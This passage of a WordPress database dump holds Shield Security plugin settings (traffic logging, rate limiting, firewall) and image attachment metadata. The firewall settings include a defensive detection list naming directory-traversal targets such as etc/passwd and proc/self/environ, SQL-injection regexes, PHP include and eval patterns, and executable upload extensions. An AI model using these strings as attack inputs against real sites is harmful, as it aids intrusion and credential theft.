module.\";}i:1;a:10:{s:3:\"key\";s:13:\"enable_logger\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hf\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:153;s:4:\"name\";s:21:\"Enable Traffic Logger\";s:7:\"summary\";s:35:\"Turn On The Traffic Logging Feature\";s:11:\"description\";s:71:\"Enable or disable the ability to log and monitor requests to your site.\";}i:2;a:12:{s:3:\"key\";s:15:\"type_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:4:\"type\";s:15:\"multiple_select\";s:8:\"advanced\";b:1;s:7:\"default\";a:4:{i:0;s:9:\"logged_in\";i:1;s:4:\"cron\";i:2;s:6:\"search\";i:3;s:6:\"uptime\";}s:13:\"value_options\";a:7:{i:0;a:2:{s:9:\"value_key\";s:6:\"simple\";s:4:\"text\";s:15:\"Simple Requests\";}i:1;a:2:{s:9:\"value_key\";s:3:\"api\";s:4:\"text\";s:8:\"REST API\";}i:2;a:2:{s:9:\"value_key\";s:4:\"ajax\";s:4:\"text\";s:4:\"AJAX\";}i:3;a:2:{s:9:\"value_key\";s:9:\"logged_in\";s:4:\"text\";s:15:\"Logged-In Users\";}i:4;a:2:{s:9:\"value_key\";s:4:\"cron\";s:4:\"text\";s:7:\"WP CRON\";}i:5;a:2:{s:9:\"value_key\";s:6:\"search\";s:4:\"text\";s:14:\"Search Engines\";}i:6;a:2:{s:9:\"value_key\";s:6:\"uptime\";s:4:\"text\";s:26:\"Uptime Monitoring Services\";}}s:9:\"link_info\";s:19:\"https://shsec.io/eb\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:154;s:4:\"name\";s:22:\"Traffic Log Exclusions\";s:7:\"summary\";s:41:\"Select Which Types Of Requests To Exclude\";s:11:\"description\";s:74:\"Deselect any requests that you don\'t want to appear in the traffic viewer.\";}i:3;a:12:{s:3:\"key\";s:17:\"custom_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/ec\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:154;s:4:\"name\";s:17:\"Custom Exclusions\";s:7:\"summary\";s:33:\"Provide Custom Traffic Exclusions\";s:11:\"description\";s:98:\"For each entry, if the text is present in either the User Agent or Page/Path, it will be excluded.\";}i:4;a:11:{s:3:\"key\";s:10:\"auto_clean\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"default\";i:3;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Auto Expiry Cleaning\";s:7:\"summary\";s:30:\"Enable Traffic Log Auto Expiry\";s:11:\"description\";s:78:\"Automated DB cleanup will delete logs older than this maximum value (in days).\";}i:5;a:12:{s:3:\"key\";s:11:\"max_entries\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Max Log Length\";s:7:\"summary\";s:34:\"Maximum Traffic Log Length To Keep\";s:11:\"description\";s:81:\"Automated DB cleanup will delete logs to maintain this maximum number of records.\";}i:6;a:11:{s:3:\"key\";s:14:\"enable_limiter\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gw\";s:9:\"link_blog\";s:19:\"https://shsec.io/gx\";s:9:\"beacon_id\";i:420;s:4:\"name\";s:20:\"Enable Rate Limiting\";s:7:\"summary\";s:33:\"Turn On The Rate Limiting Feature\";s:11:\"description\";s:87:\"Enable or disable the rate limiting feature according to your rate limiting parameters.\";}i:7;a:10:{s:3:\"key\";s:14:\"limit_requests\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Max Request Limit\";s:7:\"summary\";s:48:\"Maximum Number Of Requests Allowed In Time Limit\";s:11:\"description\";s:72:\"The maximum number of requests that are allowed in the given time limit.\";}i:8;a:10:{s:3:\"key\";s:15:\"limit_time_span\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:27:\"Request Limit Time Interval\";s:7:\"summary\";s:48:\"The Time Interval To Test For Excessive Requests\";s:11:\"description\";s:84:\"The time limit within which to monitor for excessive requests that exceed the limit.\";}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"traffic\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Traffic\\Handler\";}s:16:\"db_table_traffic\";a:2:{s:4:\"slug\";s:7:\"traffic\";s:11:\"cols_custom\";a:8:{s:3:\"rid\";s:52:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Request ID\'\";s:3:\"uid\";s:53:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'User ID\'\";s:2:\"ip\";s:55:\"varbinary(16) DEFAULT NULL COMMENT \'Visitor IP Address\'\";s:4:\"path\";s:54:\"text NOT NULL DEFAULT \'\' COMMENT \'Request Path or URI\'\";s:4:\"code\";s:58:\"int(5) NOT NULL DEFAULT \'200\' COMMENT \'HTTP Response Code\'\";s:4:\"verb\";s:56:\"varchar(10) NOT NULL DEFAULT \'get\' COMMENT \'HTTP Method\'\";s:2:\"ua\";s:40:\"text COMMENT \'Browser User Agent String\'\";s:5:\"trans\";s:61:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Trangression\'\";}}s:18:\"traffic_table_name\";s:7:\"traffic\";s:6:\"events\";a:1:{s:22:\"request_limit_exceeded\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468218,'_site_transient_shield_mod_config_e0ce0f03379bf671b03928a2cd660f1a','a:6:{s:4:\"slug\";s:8:\"firewall\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"firewall\";s:4:\"name\";s:8:\"Firewall\";s:12:\"sidebar_name\";s:8:\"Firewall\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"firewall\";s:7:\"tagline\";s:61:\"Automatically block malicious URLs and data sent to your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:30;}s:8:\"sections\";a:6:{i:0;a:6:{s:4:\"slug\";s:33:\"section_firewall_blocking_options\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Firewall Blocking Options\";s:11:\"title_short\";s:17:\"Firewall Blocking\";s:9:\"beacon_id\";i:333;s:7:\"summary\";a:2:{i:0;s:56:\"Here you choose what kind of malicious data to scan for.\";i:1;s:198:\"Recommendation - Turn on as many options here as you can. If you find an incompatibility or something stops working, un-check 1 option at a time until you find the problem or review the Audit Trail.\";}}i:1;a:5:{s:4:\"slug\";s:38:\"section_choose_firewall_block_response\";s:5:\"title\";s:30:\"Choose Firewall Block Response\";s:11:\"title_short\";s:17:\"Firewall Response\";s:9:\"beacon_id\";i:334;s:7:\"summary\";a:2:{i:0;s:75:\"Here you choose how the plugin will respond when it detects malicious data.\";i:1;s:54:\"Recommendation - Choose the option \'Die With Message\'.\";}}i:2;a:5:{s:4:\"slug\";s:17:\"section_whitelist\";s:5:\"title\";s:71:\"Whitelists - IPs, Pages, Parameters, and Users that bypass the Firewall\";s:11:\"title_short\";s:9:\"Whitelist\";s:9:\"beacon_id\";i:335;s:7:\"summary\";a:2:{i:0;s:124:\"In principle you should not need to whitelist anything or anyone unless you have discovered a collision with another plugin.\";i:1;s:90:\"Recommendation - Do not whitelist anything unless you are confident in what you are doing.\";}}i:3;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:9:\"beacon_id\";i:139;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:4;a:5:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:5:\"title\";s:23:\"Enable Module: Firewall\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:253;s:7:\"summary\";a:2:{i:0;s:123:\"Purpose - The Firewall is designed to analyse data sent to your website and block any requests that appear to be malicious.\";i:1;s:53:\"Recommendation - Keep the Firewall feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:15:{i:0;a:11:{s:3:\"key\";s:15:\"enable_firewall\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/43\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf01\";s:9:\"beacon_id\";i:253;s:4:\"name\";s:15:\"Enable Firewall\";s:7:\"summary\";s:39:\"Enable (or Disable) The Firewall module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Firewall module\";}i:1;a:11:{s:3:\"key\";s:21:\"include_cookie_checks\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"beacon_id\";i:333;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Include Cookies\";s:7:\"summary\";s:41:\"Also Test Cookie Values In Firewall Tests\";s:11:\"description\";s:95:\"The firewall tests GET and POST, but with this option checked it will also check COOKIE values.\";}i:2;a:9:{s:3:\"key\";s:19:\"block_dir_traversal\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Directory Traversals\";s:7:\"summary\";s:26:\"Block Directory Traversals\";s:11:\"description\";s:71:\"This will block directory traversal paths in in application parameters.\";}i:3;a:9:{s:3:\"key\";s:17:\"block_sql_queries\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"SQL Queries\";s:7:\"summary\";s:17:\"Block SQL Queries\";s:11:\"description\";s:46:\"This will block SQL in application parameters.\";}i:4;a:9:{s:3:\"key\";s:21:\"block_wordpress_terms\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"WordPress Terms\";s:7:\"summary\";s:30:\"Block WordPress Specific Terms\";s:11:\"description\";s:91:\"This will block WordPress specific terms in application parameters (wp_, user_login, etc.).\";}i:5;a:9:{s:3:\"key\";s:22:\"block_field_truncation\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Field Truncation\";s:7:\"summary\";s:30:\"Block Field Truncation Attacks\";s:11:\"description\";s:66:\"This will block field truncation attacks in application parameters\";}i:6;a:9:{s:3:\"key\";s:14:\"block_php_code\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"PHP Code\";s:7:\"summary\";s:23:\"Block PHP Code Includes\";s:11:\"description\";s:132:\"This will block any data that appears to try and include PHP files. Will probably block saving within the Plugin/Theme file editors.\";}i:7;a:9:{s:3:\"key\";s:22:\"block_exe_file_uploads\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Exe File Uploads\";s:7:\"summary\";s:29:\"Block Executable File Uploads\";s:11:\"description\";s:59:\"This will block executable file uploads (.php, .exe, etc.).\";}i:8;a:10:{s:3:\"key\";s:20:\"block_leading_schema\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Leading Schemas\";s:7:\"summary\";s:36:\"Block Leading Schemas (HTTPS / HTTP)\";s:11:\"description\";s:135:\"This will block leading schemas http:// and https:// in application parameters (off by default; may cause problems with other plugins).\";}i:9;a:10:{s:3:\"key\";s:16:\"block_aggressive\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Aggressive Scan\";s:7:\"summary\";s:23:\"Aggressively Block Data\";s:11:\"description\";s:159:\"Employs a set of aggressive rules to detect and block malicious data submitted to your site. Warning - May cause an increase in false-positive firewall blocks.\";}i:10;a:12:{s:3:\"key\";s:14:\"block_response\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:8:\"advanced\";b:1;s:7:\"default\";s:20:\"redirect_die_message\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:20:\"redirect_die_message\";s:4:\"text\";s:16:\"Die With Message\";}i:1;a:2:{s:9:\"value_key\";s:12:\"redirect_die\";s:4:\"text\";s:3:\"Die\";}i:2;a:2:{s:9:\"value_key\";s:13:\"redirect_home\";s:4:\"text\";s:21:\"Redirect To Home Page\";}i:3;a:2:{s:9:\"value_key\";s:12:\"redirect_404\";s:4:\"text\";s:10:\"Return 404\";}}s:9:\"beacon_id\";i:334;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Block Response\";s:7:\"summary\";s:50:\"How the firewall responds when it blocks a request\";s:11:\"description\";s:100:\"We recommend dying with a message so you know what might have occurred when the firewall blocks you.\";}i:11;a:9:{s:3:\"key\";s:16:\"block_send_email\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Email Report\";s:7:\"summary\";s:89:\"When a visitor is blocked the firewall will send an email to the configured email address\";s:11:\"description\";s:124:\"Use with caution - if you get hit by automated bots you may send out too many emails and you could get blocked by your host.\";}i:12;a:11:{s:3:\"key\";s:21:\"page_params_whitelist\";s:7:\"section\";s:17:\"section_whitelist\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:21:\"comma_separated_lists\";s:9:\"link_info\";s:19:\"https://shsec.io/2a\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:335;s:4:\"name\";s:20:\"Whitelist Parameters\";s:7:\"summary\";s:74:\"Detail pages and parameters that are whitelisted (ignored by the firewall)\";s:11:\"description\";s:104:\"This should be used with caution and you should only provide parameter names that you must have excluded\";}i:13;a:10:{s:3:\"key\";s:16:\"whitelist_admins\";s:7:\"section\";s:17:\"section_whitelist\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Ignore Administrators\";s:7:\"summary\";s:21:\"Ignore Administrators\";s:11:\"description\";s:78:\"Authenticated administrator users will not be processed by the firewall rules.\";}i:14;a:12:{s:3:\"key\";s:16:\"text_firewalldie\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"beacon_id\";i:139;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Firewall Block Message\";s:7:\"summary\";s:63:\"Message Displayed To Visitor When A Firewall Block Is Triggered\";s:11:\"description\";s:102:\"When you select the option to display a message to the visitor, this is the message that is displayed.\";}}s:11:\"definitions\";a:3:{s:17:\"default_whitelist\";a:14:{s:29:\"/wp-admin/options-general.php\";a:0:{}s:21:\"/wp-admin/options.php\";a:2:{i:0;s:4:\"home\";i:1;s:7:\"siteurl\";}s:21:\"/wp-admin/plugins.php\";a:1:{i:0;s:6:\"plugin\";}s:22:\"/wp-admin/post-new.php\";a:0:{}s:22:\"/wp-admin/page-new.php\";a:0:{}s:22:\"/wp-admin/link-add.php\";a:0:{}s:26:\"/wp-admin/media-upload.php\";a:0:{}s:19:\"/wp-admin/admin.php\";a:1:{i:0;s:4:\"page\";}s:18:\"/wp-admin/post.php\";a:1:{i:0;s:7:\"content\";}s:27:\"/wp-admin/plugin-editor.php\";a:1:{i:0;s:10:\"newcontent\";}s:18:\"/wp-admin/page.php\";a:0:{}s:24:\"/wp-admin/admin-ajax.php\";a:0:{}s:21:\"/wp-comments-post.php\";a:2:{i:0;s:3:\"url\";i:1;s:7:\"comment\";}s:1:\"*\";a:31:{i:0;s:12:\"affwp_action\";i:1;s:7:\"ajaxurl\";i:2;s:20:\"g-recaptcha-response\";i:3;s:11:\"verify_sign\";i:4;s:6:\"txn_id\";i:5;s:15:\"wp_http_referer\";i:6;s:16:\"_wp_http_referer\";i:7;s:25:\"_wp_original_http_referer\";i:8;s:11:\"JCS_INENREF\";i:9;s:5:\"pass1\";i:10;s:10:\"pass1-text\";i:11;s:3:\"pwd\";i:12;s:3:\"url\";i:13;s:10:\"referredby\";i:14;s:11:\"redirect_to\";i:15;s:28:\"jetpack_sso_original_request\";i:16;s:23:\"jetpack_sso_redirect_to\";i:17;s:33:\"/^wordpress_logged_in_[0-9a-f]+$/\";i:18;s:10:\"edd_action\";i:19;s:12:\"edd_redirect\";i:20;s:10:\"wpcf7-form\";i:21;s:20:\"yoast_wpseo_metadesc\";i:22;s:26:\"icwp_wpsf_new_u2f_response\";i:23;s:17:\"icwp_wpsf_u2f_otp\";i:24;s:5:\"appId\";i:25;s:8:\"/^et_.*/\";i:26;s:10:\"ping_sites\";i:27;s:20:\"aioseo-post-settings\";i:28;s:14:\"joe-chnlcustid\";i:29;s:12:\"spd-custhash\";i:30;s:12:\"joe-custinfo\";}}s:17:\"firewall_patterns\";a:8:{s:12:\"dirtraversal\";a:1:{s:6:\"simple\";a:8:{i:0;s:10:\"etc/passwd\";i:1;s:17:\"proc/self/environ\";i:2;s:10:\"etc/passwd\";i:3;s:8:\"makefile\";i:4;s:7:\"wwwroot\";i:5;s:10:\"pingserver\";i:6;s:3:\"../\";i:7;s:8:\"loopback\";}}s:7:\"wpterms\";a:2:{s:6:\"simple\";a:2:{i:0;s:4:\"/**/\";i:1;s:13:\"wp-config.php\";}s:5:\"regex\";a:3:{i:0;s:4:\"^wp_\";i:1;s:11:\"^user_login\";i:2;s:10:\"^user_pass\";}}s:15:\"fieldtruncation\";a:1:{s:5:\"regex\";a:2:{i:0;s:7:\"\\s{49,}\";i:1;s:4:\"\\x00\";}}s:10:\"sqlqueries\";a:1:{s:5:\"regex\";a:3:{i:0;s:11:\"concat\\s*\\(\";i:1;s:12:\"group_concat\";i:2;s:13:\"union.*select\";}}s:7:\"exefile\";a:1:{s:5:\"regex\";a:1:{i:0;s:86:\"\\.(dll|rb|py|exe|php[3-6]?|pl|perl|ph[34]|phl|phtml|phtm|sql|ini|jsp|asp|git|svn|tar)$\";}}s:6:\"schema\";a:2:{s:6:\"simple\";a:1:{i:0;s:6:\".shtml\";}s:5:\"regex\";a:1:{i:0;s:23:\"^(http|https|ftp|file):\";}}s:7:\"phpcode\";a:2:{s:6:\"simple\";N;s:5:\"regex\";a:1:{i:0;s:52:\"(include|include_once|require|require_once)\\s*\\(.*\\)\";}}s:10:\"aggressive\";a:2:{s:6:\"simple\";a:11:{i:0;s:5:\"eval(\";i:1;s:6:\"(null)\";i:2;s:7:\"base64_\";i:3;s:9:\"localhost\";i:4;s:10:\"(function(\";i:5;s:8:\"{x.html(\";i:6;s:7:\").html(\";i:7;s:3:\"...\";i:8;s:10:\"/httpdocs/\";i:9;s:5:\"/tmp/\";i:10;s:8:\"boot.ini\";}s:5:\"regex\";a:5:{i:0;s:16:\"GLOBALS(=|\\[|%%)\";i:1;s:16:\"REQUEST(=|\\[|%%)\";i:2;s:24:\"(`|\\<|\\>|\\[|\\]|\\{|\\}|\\?)\";i:3;s:32:\"drop\\s+table\\s+(`|\'?)[a-z0-9]+\\1\";i:4;s:53:\"\'\\s+OR\\s+\'([a-z0-9]+)\'\\s*=\\s*\'\\1\'\\s+(--|\\(\\{|\\/\\*)\\s+\";}}}s:6:\"events\";a:12:{s:10:\"check_skip\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:14:\"firewall_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:23:\"blockparam_dirtraversal\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_wpterms\";a:1:{s:3:\"cat\";i:3;}s:26:\"blockparam_fieldtruncation\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_sqlqueries\";a:1:{s:3:\"cat\";i:3;}s:17:\"blockparam_schema\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_aggressive\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_phpcode\";a:1:{s:3:\"cat\";i:3;}s:13:\"block_exefile\";a:1:{s:3:\"cat\";i:3;}s:13:\"fw_email_fail\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:16:\"fw_email_success\";a:1:{s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1628268100;}','no');
/*!40000 ALTER TABLE `lwz_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_postmeta`
--

DROP TABLE IF EXISTS `lwz_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=5535 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_postmeta`
--

LOCK TABLES `lwz_postmeta` WRITE;
/*!40000 ALTER TABLE `lwz_postmeta` DISABLE KEYS */;
INSERT INTO `lwz_postmeta` VALUES (3580,873,'_wp_attachment_backup_sizes','a:12:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1242;s:6:\"height\";i:1554;s:4:\"file\";s:16:\"SorLawson_HS.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-768x961.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:961;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:25:\"SorLawson_HS-818x1024.jpg\";s:5:\"width\";i:818;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:24:\"SorLawson_HS-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3581,726,'_wp_attachment_backup_sizes','a:10:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:20:\"Michele-Franklin.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-640x300.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3578,869,'_wp_attachment_backup_sizes','a:12:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3449;s:6:\"height\";i:5173;s:4:\"file\";s:12:\"IMG_0852.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4: